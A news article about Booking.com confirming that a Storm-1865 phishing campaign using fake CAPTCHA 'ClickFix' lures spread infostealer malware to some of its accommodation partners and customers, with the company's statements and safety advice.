Booking.com Confirms Password Scam Targeting Customers and Partners

Booking.com has confirmed that a sophisticated phishing scam, involving an infostealer malware campaign, has impacted a portion of its accommodation partners and customers. The scam, identified by Microsoft Threat Intelligence, uses fake CAPTCHA tests—part of the so-called ClickFix threat—to trick victims into executing malicious code that ultimately compromises their account credentials and financial data.

A Global Campaign by the Storm-1865 Group

The phishing campaign, attributed to the Storm-1865 group, employs a variety of deceptive lures. Emails purporting to originate from Booking.com have been sent to individuals working in the hospitality industry across North America, Oceania, South and Southeast Asia, and across Europe. The fraudulent messages range from prompts about account verification and payment issues to notifications about guest reviews or promotional opportunities.

Microsoft Threat Intelligence analysts explained that these emails display fake error messages or prompts designed to exploit human problem-solving tendencies. By instructing targets to copy, paste, and execute specific commands, the attackers trick users into downloading malware. This user-interactive element allows the threat to bypass many conventional and automated security measures.

Booking.com’s Response

In a statement issued by a Booking.com spokesperson, the company confirmed that while its systems have not been breached, some of its accommodation partners and customers have unfortunately been affected by the phishing attacks. “Phishing attacks by criminal organizations pose a significant threat to many industries,” the spokesperson said. “While we can confirm that Booking.com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals.”

Booking.com emphasized that the number of affected accommodations represents only a small fraction of those using its platform. The company is actively investing in enhanced cybersecurity measures and continues to provide education and resources to help its partners and customers stay protected. Customers are advised to verify any payment messages by checking the details on their booking confirmations, and to report any suspicious communications immediately through official Booking.com channels.

Staying Vigilant Against Cyber Threats

As cybercriminals employ increasingly sophisticated tactics, experts warn that vigilance remains key. The fake CAPTCHA technique used in this scam is particularly dangerous because it leverages normal user interactions, such as typing commands, to facilitate the download of malware.

Booking.com reiterated its commitment to customer and partner safety, stating: “We urge our customers and partners to remain vigilant. If you encounter any communication that seems suspicious or requests sensitive information through unofficial channels, please do not engage. Report it immediately to our customer service team through official Booking.com channels.” The company’s Trust and Safety Resource Center provides further guidance on recognizing and avoiding phishing attempts.

This latest incident underscores the growing challenge of cybersecurity in an interconnected world and the importance of robust, proactive defense measures to protect personal and financial data from evolving threats.

Photo Credit: DepositPhotos.com